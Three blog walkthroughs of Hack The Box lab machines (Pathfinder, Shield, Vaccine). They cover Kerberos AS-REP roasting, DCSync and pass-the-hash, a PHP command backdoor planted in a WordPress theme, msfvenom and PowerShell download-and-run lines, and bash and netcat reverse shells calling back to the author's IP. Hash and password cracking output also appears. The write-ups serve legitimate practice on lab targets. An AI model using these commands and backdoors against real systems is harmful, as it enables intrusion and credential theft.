Hack The Box – Pathfinder

Posted on January 12, 2025January 12, 2025 by haxez

Hello world, welcome to haxez where today I will be looking at the Hack The Box Machine Pathfinder. This box was a lot of fun and straight forward thanks to the walkthrough from h4rithd. Yes, I’m using walkthroughs… Honestly though, a lot of the time on Hack The Box, the problem is knowing which questions to ask. If you don’t know about a certain tool or about that specific weakness in a software configuration then you could be looking for hours or even days to find a foothold. I’m here to learn about these tools and software configuration weaknesses, not spend hours researching all the potential ways they could be exploited. Anyway, with that out the way, lets begin.

Pathfinder Enumeration

First I spun up the machine and connected to the VPN. Next I pinged the box to see if it was responding and yep, the machine started talking to me.

└──╼ [★]$ ping 10.10.10.30
PING 10.10.10.30 (10.10.10.30) 56(84) bytes of data.
64 bytes from 10.10.10.30: icmp_seq=1 ttl=127 time=21.6 ms

So what do we do next? We nmap of course.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.30 | tee -a nmap.txt
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h06m49s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021–09–11T17:34:17
|_ start_date: N/A

DNS Zone Transfer

Well hello Domain Controller, have you come to tell me your secrets? Ok so there are a lot of services listening but the most important ones on a Domain Controller are usually Server Message Block (SMB 445), Lightweight Directory Access Protocol (LDAP 389) and Kerberos (88). I did however immediately notice that port 53 TCP was open. Port 53 is used for DNS but you would normally only see it on UDP. If port 53 TCP is open then it usually means that the protocol is accepting DNS Zone transfer requests. Alas, this one didn’t tell me anything.

└──╼ [★]$ dig axfr @10.10.10.30 MEGACORP
; <<>> DiG 9.16.15-Debian <<>> axfr @10.10.10.30 MEGACORP
; (1 server found)
;; global options: +cmd
; Transfer failed. :-(

Pathfinder SMB Enumeration

So with that rabbit hole out the way it was time to look at Server Message Block and see if it had been misconfigured to allow the listing of shares and stuff. I first ran enum4linux in hopes that it would give me some information but honestly the tool just doesn’t seem to work that often. So next I used smbclient to see what was going on.

└──╼ [★]$ smbclient -L 10.10.10.30
Enter WORKGROUP\joe’s password:
Anonymous login successful
Sharename Type Comment
 — — — — — — — — — — -

LDAP

The Anonymous login was successful but there was nothing on there. Hmmm another dead end. Ok then, lets focus on LDAP and see what information we can interrogate out of it. At first I was getting nowhere. I got a bit of information out from the protocol using ldapsearch but nothing substantial.

└──╼ [★]$ sudo ldapsearch -x -h 10.10.10.30 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
dn:
namingcontexts: DC=MEGACORP,DC=LOCAL
namingcontexts: CN=Configuration,DC=MEGACORP,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=MEGACORP,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=MEGACORP,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1

Pathfinder LDAP Domain Dump

So what was next? Well this is where I turned to the walkthrough written by h4rithd. Honestly I wouldn’t have gotten any further if it wasn’t for this walkthrough. So it turns out that the Sandra user on the Shield box was quite important. I should have learnt my lesson by now but as soon as I get the root flag, I log off write up and go and watch tv. Sandra appears to exist on this box and we can use their credentials to do some enumeration. Enter ldapdomaindump, this tool is cool. Running ldapdomaindump with sandra’s credentials we get a bunch of html files containing information about the domain.

Kereros Preauth — Kerberos DONT_REQ_PREAUTH

The one user that should grab our attention is the svc_bes as it doesn’t require Kerberos pre authentication. If pre authentication isn’t required, then we can trick Kerberos in to giving us an encrypted Ticket Granting Ticket hash and then crack it offline. I’m getting ahead of myself, more about that later. So lets grab that TGT hash! Using the Impacket tool GetNPUsers.py we can request the TGT for the svc_bes user.

└──╼ [★]$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py MEGACORP.LOCAL/svc_bes -dc-ip 10.10.10.30 -request -no-pass -format john
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
[*] Getting TGT for svc_bes
[email protected]:c818cd9132de09878439dd73cc96a930$73b8ea1807114952f569afabd24391f25818660e8386fa926857af7d6382ad42d9d24e80300fcb43ebdcd40b2bbb9d13b462a83b5b87417e341625a146b503e89fdb18a6ff80fcce6fe776160e45cbf7a32978eee153d5f3b55539cef3c4ac56763811ce5d1b856afa9fce10fa3cdda54828ba2dc047f5109697ca0d0fecd3387421e328240c9b17a9567faa8be961ac30a739d56a1b66d9d5f6b1df01f7176382a7a483527cea0a8c2105a0812d142333b0412734eeee144d9be74c16cb1b3220e881819120a2691a825f19fbb9761d1c23cba03c8ed84ac4203a0706fa4e7fd947150e65ff7a78c0f4f051ad61bb49

Pathfinder Hash Cracking

Yummmm, don’t you just love the smell of hashes in the morning, or anytime for that matter. Ok so what’s next? Well we need to talk to our mate John and ask him to do the dirty work, no I don’t me kill him. I mean crack him really hard with a rock. Grab the hash output and chuck it in a file using your favourite non escapable text editor vim, or nano (I don’t judge). Then, tell John where your rock is and ask him politely to beat the secrets out of him.

└──╼ [★]$ sudo john beshash.txt — wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
Sheffield19 ([email protected])
1g 0:00:00:08 DONE (2021–09–11 12:22) 0.1157g/s 1227Kp/s 1227Kc/s 1227KC/s Sherbert!!..Shawnee
Use the “ — show” option to display all of the cracked passwords reliably
Session completed

Voila, the password is Sheffield19.

Hi Darren

Story time, I once met Darren Kitchen from Hak5 in Sheffield when he was touring the UK on his motorcycle. I caught the train there from where I was staying for Uni and had a beer with him. Really cool guy but I couldn’t stay long as the last train was at midnight or something. Someone took a photo but I never got a copy, hey photography man, if you’re out there, I would love the Picture of Darren and myself from the Hak5 Sheffield meet please.

Evil WinRM

Anyway, moving on, we now have the password and can use evil-winrm to login to the box and see what’s around.

└──╼ [★]$ evil-winrm -u svc_bes -p Sheffield19 -i 10.10.10.30
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_bes\Documents>
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt
b05XXXXXXXXXXXXXXXXX37f1

Secrets Dump

Turns out what was around was the user flag and now we have successfully captured it. Ok so what’s next? We have a vaid set of credentials so lets see if we can try and dump some secrets using the impacket tool secretsdump.py. This tool performs a DCSync attack against the machine due to the trust that is provided by the authenticated user. This means it is possible to use the domain replication privileges of the authenticated user to gather information from the domain including password hashes. For it to work though, we need to know If our user has domain replication privileges. Need to actually work out how to do that at some point but for now I’m just going to run the script.

└──╼ [★]$ /usr/share/doc/python3-impacket/examples/secretsdump.py MEGACORP.LOCAL/svc_bes:[email protected]
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 — rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:9635702428c5134926387fa5db2010c8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1–96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1–96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1–96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1–96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1–96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
svc_bes:aes128-cts-hmac-sha1–96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1–96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1–96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1–96:753157a7307cc0c55569930f182edad660cc4492f27491efb6b8f6f1f7dd8824
PATHFINDER$:aes128-cts-hmac-sha1–96:e25b80d1951cd2410ac1ce2f446b63f4
PATHFINDER$:des-cbc-md5:25fbb06d258cd943
[*] Cleaning up…

Pathfinder Pass The Hash

We have an Administrator password hash. Lets be kind and pass it forward using psexec.py

└──╼ [★]$ /usr/share/doc/python3-impacket/examples/psexec.py MEGACORP.LOCAL/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.30…..
[*] Found writable share ADMIN$
[*] Uploading file fpnaGrFs.exe
[*] Opening SVCManager on 10.10.10.30…..
[*] Creating service ovNb on 10.10.10.30…..
[*] Starting service ovNb…..
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
© 2018 Microsoft Corporation. All rights reserved.

He shoots, he scores, and for my final trick I will recover the root.txt flag.


C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
ee6XXXXXXXXXXXXXXXXX645

Hack The Box – Shield

Posted on January 12, 2025January 12, 2025 by haxez

Hello world, welcome to haxez where in this post im going to be looking at the Hack The Box Machine Shield. This box gave me more trouble than I care to admit. I wouldn’t classify it as super easy that’s for sure. I have owned around 30 machines so far and this one was up there on the frustrated me list.

There are other great guides out for this box and I’m not pretending that I’m the first to write a walkthrough for it. artilleryRed, eldruin and many others have written great guides which I had to use to complete this box. I’m writing this merely as a way for me to better understand the techniques used and to document my progress.

Shield Enumeration

So first things first we perform our tried and tested nmap scan and wait for the results.

[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Shield/Output]
└──╼ [★]$ nmap -Pn -sC -sV — min-rate=1000 -T4 -p0- 10.10.10.29PORT STATE SERVICE VERSION
80/tcp open tcpwrapped
| http-methods:
|_ Supported Methods: HEAD OPTIONS
|_http-server-header: Microsoft-IIS/10.0
3306/tcp open tcpwrapped
| mysql-info:
|_ MySQL Error: Host ‘10.10.15.199’ is not allowed to connect to this MySQL server

It looks like we have a webserver and MySQL running so lets go and take a look at the webserver. Upon punching in the IP address we are greeted with a default Internet Information Services page. If we didn’t know before then we can deduct that this is a Windows box.

Shield Internet Information Services Default Page

Crawling Shield

Ok so what else is there on this box, lets brute force the files and folders and see if there is anything that has been left behind by the creator. I used the tool dirb to crawl the files and folders to see whether there was anything interesting.

[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Shield/Output]
└──╼ [★]$ sudo dirb http://10.10.10.29/
DIRB v2.22
By The Dark Raver
— — — — — — — — -
START_TIME: Wed Sep 8 20:37:47 2021
URL_BASE: http://10.10.10.29/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
— — — — — — — — -
GENERATED WORDS: 4612
— — Scanning URL: http://10.10.10.29/ — — 
==> DIRECTORY: http://10.10.10.29/wordpress/
— Entering directory: http://10.10.10.29/wordpress/ — — 
+ http://10.10.10.29/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://10.10.10.29/wordpress/wp-admin/
==> DIRECTORY: http://10.10.10.29/wordpress/wp-content/
==> DIRECTORY: http://10.10.10.29/wordpress/wp-includes/

WordPress

Okie dokie, we have a WordPress content management system installed. WordPress isone of the most used content management system available now. It also has a lot of documentation on how you can rip it to shreds. After poking at it for a bit and not making much progress I looked at a walkthrough and saw that they were using credentials that were found on a previous box. This was one of the things that I found annoying at first. I was treating the box as a stand alone box. I guess thats why hackers have to think outside of the box…

Shield Foothold

Turns out the credentials worked, while reading the official walkthrough I also noticed that they used the Metasploit module wp_admin_shell_upload to get a shell on the box. I tried this and had no luck what so ever. I’ve included my configuration below so you can check it and let me know if I was doing anything wrong. The exploit worked but no session was created, who knows.

Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — -
PASSWORD P@s5w0rd! yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port
RHOSTS 10.10.10.29 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
USERNAME admin yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — — -
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

So with that issue out the way I decided to log in to WordPress and poke around. I have managed to get a reverse shell before by editing the 404 PHP template and sticking a PHP reverse shell in there. In order to trigger it you just need to visit a page that doesn’t exist. Well no such luck on this machine, there is no 404 template. I tried a few other pages with PHP reverse shells but didn’t get anywhere. After this it was getting late so I gave up for the night.

The following day was much more productive. I edited the Single Post single.php file and stuck the simple-backdoor.php script in there.

<! — Simple PHP backdoor by DK (http://michaeldaw.org) →
<?php
if(isset($_REQUEST[‘cmd’])){
 echo “<pre>”;
 $cmd = ($_REQUEST[‘cmd’]);
 system($cmd);
 echo “</pre>”;
 die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<! — http://michaeldaw.org 2006 →

This script is awesome as it allows you to execute commands through the cmd parameter. With that saved to the single.php file it was time to test whether it worked. By calling the following URL it was possible to list the files in the directory where the script was being executed from.

The following command was used to test wether the backdoor was working.

http://10.10.10.29/wordpress/wp-content/themes/highlight/single.php?cmd=dir

Reverse Shell

Now that we have command execution it is time to get on to the box via a reverse shell. In order to do this I created a reverse shell executable using MSFVenom.

sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.199 LPORT=1337 -f exe -e x86/shikata_ga_nai -i 9 -o reverse.exe

With the payload created I started a Python webserver that the Shield machine could connect to and download it. By pasting the following URL in the browser with the additional cmd parameter commands, the machine downloads and saves the reverse shell payload locally.

http://10.10.10.29/wordpress/wp-content/themes/highlight/single.php?cmd=powershell -c “(New-Object Net.Webclient).DownloadFile(‘http://10.10.15.199/reverse.exe','C:\inetpub\wwwroot\wordpress\wp-content\themes\highlight\reverse.exe')"

With the file downloaded on to the server, we need to set up our netcat listener.

sudo nc -lvp 1337

Now time to get the reverse.exe file from the webserver.

http://10.10.10.29/wordpress/wp-content/themes/highlight/single.php?cmd=reverse.exe

Shield Privilege Escalation

Bingo we have access to the box, what now? There is lots of tools out there that you can use to gather information about the host and look for potential privilege escalation paths. One such tool is winPEAS. I won’t go into the details of finding the escalation path but it turns out I needed to use Juicy Potato. This part of the machine was an absolute nightmare, no matter what Class ID I used, the exploit failed. Well one machine reset later and pulling the first CLSID from the list found here and I had a shell back to my host with system.

In order to do this I first downloaded and uploaded JuicyPotato to the system using the same method as the reverse.exe payload. I also did the same with nc.exe. I then created a batch file with the following payload inside.

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.2 1111 > shell.bat

Once that was in place it was time to run JuicyPotato and invoke the shell.bat file to create a reverse shell back to my host. Make sure you have another listener running on your host ready to accept the connection.

jp.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\themes\highlight\shell.bat -l 9999 -t * -c {03ca98d6-ff5d-49b8-abc6–03dd84127020}

It was then possible to capture the root key via the newly created shell.

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
6e9XXXXXXXXXXXXXXXXX4fa

Hack The Box – Vaccine

Posted on January 12, 2025January 12, 2025 by haxez

Hello world, welcome to haxez where today we’re looking at Vaccine from Hack The Box. What’s that you say? You don’t know where to begin when trying to hack something? Well, my old chum I’ve got your back. So provided you have permission to hack the target you want to hack and that the rules of engagement have been agreed upon; you start by scanning the box. There are many security tools that can scan a host for vulnerabilities. If you want something quick and easy then check out Nessus, however Nmap is an essential tool that everyone should learn. So connect to the VPN, spin up the box and Nmap the heck out of it.

Vaccine Enumeration

Sudo nmap -sC -sV -O -p0- 10.10.10.46
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu)

FTP

As you can see from the results, port 21 FTP (File Transfer Protocol), port 22 (Secure Shell) and port 80 (HTTP/Web Server) are exposed (not like that). The first thing I checked was whether FTP allowed Anonymous access, it didn’t. I then checked the website, but it required a login. However, after performing some post exploitation investigation on the previous box Oopsie, I found the FTP credentials ftpuser / mc@F1l3ZilL4.

$ ftp 10.10.10.46
Connected to 10.10.10.46.
220 (vsFTPd 3.0.3)
Name (10.10.10.46:joe): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r — r — 1 0 0 2533 Feb 03 2020 backup.zip
226 Directory send OK

Vaccine Hash

Huzzah! The credentials worked and what’s that? A file called backup.zip? I needed to take a look at the contents of that zip file so I downloaded it using the get command. Once the zip file was downloaded, I tried to unzip but it promoted me for a password. The FTP password didn’t work neither did any of the passwords from the previous boxes. Luckily a tool exists that can be used to crack zip file passwords. Zip2john is a tool that creates a hash from a zip file that can then be cracked using johntheripper.


─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ zip2john backup.zip > hash.txt
─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ cat hash.txt
backup.zip:$pkzip2$2*2*1*0*8*24*3a41*5722*543fb39ed1a919ce7b58641a238e00f4cb3a826cfb1b8f4b225aa15c4ffda8fe72f60a82*2*0*3da*cca*1b1ccd6a*504*43*8*3da*1b1c*989a*22290dc3505e51d341f31925a7ffefc181ef9f66d8d25e53c82afc7c1598fbc3fff28a17ba9d8cec9a52d66a11ac103f257e14885793fe01e26238915796640e8936073177d3e6e28915f5abf20fb2fb2354cf3b7744be3e7a0a9a798bd40b63dc00c2ceaef81beb5d3c2b94e588c58725a07fe4ef86c990872b652b3dae89b2fff1f127142c95a5c3452b997e3312db40aee19b120b85b90f8a8828a13dd114f3401142d4bb6b4e369e308cc81c26912c3d673dc23a15920764f108ed151ebc3648932f1e8befd9554b9c904f6e6f19cbded8e1cac4e48a5be2b250ddfe42f7261444fbed8f86d207578c61c45fb2f48d7984ef7dcf88ed3885aaa12b943be3682b7df461842e3566700298efad66607052bd59c0e861a7672356729e81dc326ef431c4f3a3cdaf784c15fa7eea73adf02d9272e5c35a5d934b859133082a9f0e74d31243e81b72b45ef3074c0b2a676f409ad5aad7efb32971e68adbbb4d34ed681ad638947f35f43bb33217f71cbb0ec9f876ea75c299800bd36ec81017a4938c86fc7dbe2d412ccf032a3dc98f53e22e066defeb32f00a6f91ce9119da438a327d0e6b990eec23ea820fa24d3ed2dc2a7a56e4b21f8599cc75d00a42f02c653f9168249747832500bfd5828eae19a68b84da170d2a55abeb8430d0d77e6469b89da8e0d49bb24dbfc88f27258be9cf0f7fd531a0e980b6defe1f725e55538128fe52d296b3119b7e4149da3716abac1acd841afcbf79474911196d8596f79862dea26f555c772bbd1d0601814cb0e5939ce6e4452182d23167a287c5a18464581baab1d5f7d5d58d8087b7d0ca8647481e2d4cb6bc2e63aa9bc8c5d4dfc51f9cd2a1ee12a6a44a6e64ac208365180c1fa02bf4f627d5ca5c817cc101ce689afe130e1e6682123635a6e524e2833335f3a44704de5300b8d196df50660bb4dbb7b5cb082ce78d79b4b38e8e738e26798d10502281bfed1a9bb6426bfc47ef62841079d41dbe4fd356f53afc211b04af58fe3978f0cf4b96a7a6fc7ded6e2fba800227b186ee598dbf0c14cbfa557056ca836d69e28262a060a201d005b3f2ce736caed814591e4ccde4e2ab6bdbd647b08e543b4b2a5b23bc17488464b2d0359602a45cc26e30cf166720c43d6b5a1fddcfd380a9c7240ea888638e12a4533cfee2c7040a2f293a888d6dcc0d77bf0a2270f765e5ad8bfcbb7e68762359e335dfd2a9563f1d1d9327eb39e68690a8740fc9748483ba64f1d923edfc2754fc020bbfae77d06e8c94fba2a02612c0787b60f0ee78d21a6305fb97ad04bb562db282c223667af8ad907466b88e7052072d6968acb7258fb8846da057b1448a2a9699ac0e5592e369fd6e87d677a1fe91c0d0155fd237bfd2dc49*$/pkzip2$::backup.zip:style.css, index.php:backup.zip

Cracking The Hash

Now that we generated the hash, it was time to crack it using JohnTheRipper. In order to do this we point john at the hash and tell it which wordlist to use. As with all cracking a good place to start is rockyou.txt.

─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo john hash.txt — wordlist=/usr/share/wordlists/rockyou.txt
[sudo] password for joe:
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
741852963 (backup.zip)
1g 0:00:00:00 DONE (2021–09–07 19:02) 3.703g/s 15170p/s 15170c/s 15170C/s 123456..samanta
Use the “ — show” option to display all of the cracked passwords reliably
Session completed

Woop! looks like the password is 741852963. I tried to extract the zip file again using the password and it worked. The zip archived appeared to contain a CSS file (Cascading Stylesheet and an index.php file.

─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ unzip backup.zip
Archive: backup.zip
[backup.zip] index.php password:
inflating: index.php
inflating: style.css

Vaccine MD5 Hash

Since the CSS file was only likely to contain website formatting, I looked at the index.php file first. Well what do you know, it looks like the index.php file had an MD5 password hash hardcoded in to the applications authentication mechanism.

<?php
session_start();
if(isset($_POST[‘username’]) && isset($_POST[‘password’])) {
if($_POST[‘username’] === ‘admin’ && md5($_POST[‘password’]) === “2cb42f8734ea607eefed3b70af13bbd3”) {
$_SESSION[‘login’] = “true”;
header(“Location: dashboard.php”);
}}?>

Hashcat

A lot of MD5 password hashes can be cracked online using websites like https://crackstation.net. However, you may not always have internet access especially if you are testing a clients internal infrastructure which doesn’t have internet access. For that reason, I decided to use Hashcat. Hashcat is another cracking tool like JohnTheRipper.

─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo hashcat -m 0 md5hash.txt /usr/share/wordlists/rockyou.txthashcat (v6.1.1) starting…
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) — Platform #1 [The pocl project]
============================================================
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU P7550 @ 2.26GHz, 3546/3610 MB (1024 MB allocatable), 2MCU
2cb42f8734ea607eefed3b70af13bbd3:qwerty789
Session……….: hashcat
Status………..: Cracked
Hash.Name……..: MD5
Hash.Target……: 2cb42f8734ea607eefed3b70af13bbd3
Time.Started…..: Tue Sep 7 19:06:05 2021 (0 secs)
Time.Estimated…: Tue Sep 7 19:06:05 2021 (0 secs)
Guess.Base…….: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 237.0 kH/s (0.49ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered……..: 1/1 (100.00%) Digests
Progress………: 100352/14344386 (0.70%)
Rejected………: 0/100352 (0.00%)
Restore.Point….: 98304/14344386 (0.69%)
Restore.Sub.#1…: Salt:0 Amplifier:0–1 Iteration:0–1
Candidates.#1….: Donovan -> pacers1

Vaccine Web Aplication

The hash was successfully cracked, and I must say I was disappointed to learn it was something as simple as qwerty789. Anyway, I was then able to login to the website with the newly cracked password. Upon log in, the website was very basic. The only functionality appeared to be a search box. This instantly made me think the vulnerability was going to be some form of SQL injection. As the website was behind an authentication mechanism, I needed a way to tell SQLMap to authenticate against the application. In order to do this inspected the website and nabbed my PHPSESSID cookie.

Vaccine PHPSESSID Cookie — PHPSESSID Cookie

Vaccine SQL Injection

The first few attempts to scan the host with SQLMap were unsuccessful as no vulnerability was discovered. It had to be an SQL injection vulnerability because I had exhausted all other avenues of attack other than brute forcing the Secure Shell port. After a bit of research and a lot of reading on the HTB forums, it turns out that if another hacker exploits the SQL injection first then it won’t show as vulnerable when scanned again, not 100% sure why (weird). Anyway after requesting to reset the box a billion times I was finally able to see that the search parameter was vulnerable to SQL Injection.

─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a' — cookie=”PHPSESSID=s6j01lrmbrqh5no9pgjdg3ka2a”[*] starting @ 20:08:00 /2021–09–07/
[20:08:01] [INFO] testing connection to the target URL
[20:08:02] [INFO] testing if the target URL content is stable
[20:08:02] [INFO] target URL content is stable
[20:08:02] [INFO] testing if GET parameter ‘search’ is dynamic
[20:08:02] [INFO] GET parameter ‘search’ appears to be dynamic
[20:08:02] [INFO] heuristic (basic) test shows that GET parameter ‘search’ might be injectable (possible DBMS: ‘PostgreSQL’)
---SNIP---
[20:08:09] [INFO] GET parameter ‘search’ appears to be ‘PostgreSQL > 8.1 stacked queries (comment)’ injectable 
[20:08:09] [INFO] testing ‘PostgreSQL > 8.1 AND time-based blind’
[20:08:12] [INFO] GET parameter ‘search’ appears to be ‘PostgreSQL > 8.1 AND time-based blind’ injectable 
[20:08:12] [INFO] testing ‘Generic UNION query (NULL) — 1 to 20 columns’
GET parameter ‘search’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] n

It was time to see whether we could get a shell on the box through SQLMap.

─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a' — cookie=”PHPSESSID=s6j01lrmbrqh5no9pgjdg3ka2a” — os-shell[*] starting @ 20:08:20 /2021–09–07/
[20:08:22] [INFO] resuming back-end DBMS ‘postgresql’
[20:08:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: search (GET)
---SNIP---
[20:08:23] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[20:08:23] [INFO] fingerprinting the back-end DBMS operating system
[20:08:24] [INFO] the back-end DBMS operating system is Linux
[20:08:24] [INFO] testing if current user is DBA
[20:08:25] [INFO] retrieved: ‘1’
[20:08:25] [INFO] going to use ‘COPY … FROM PROGRAM …’ command execution
[20:08:25] [INFO] calling Linux OS shell. To quit type ‘x’ or ‘q’ and press ENTER

Brilliant, this gave us an os-shell. In order to upgrade it to a full shell I needed to create a netcat listener and run a command on the server to get it to connect back to my host. First I created the netcat listener.

─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo nc -lvp 1234

Then I ran the command on the target server.

os-shell> bash -c ‘bash -i >& /dev/tcp/10.10.15.99/1234 0>&1

The command worked and the target server connected by to my host netcat listener.

10.10.10.46: inverse host lookup failed: Unknown host
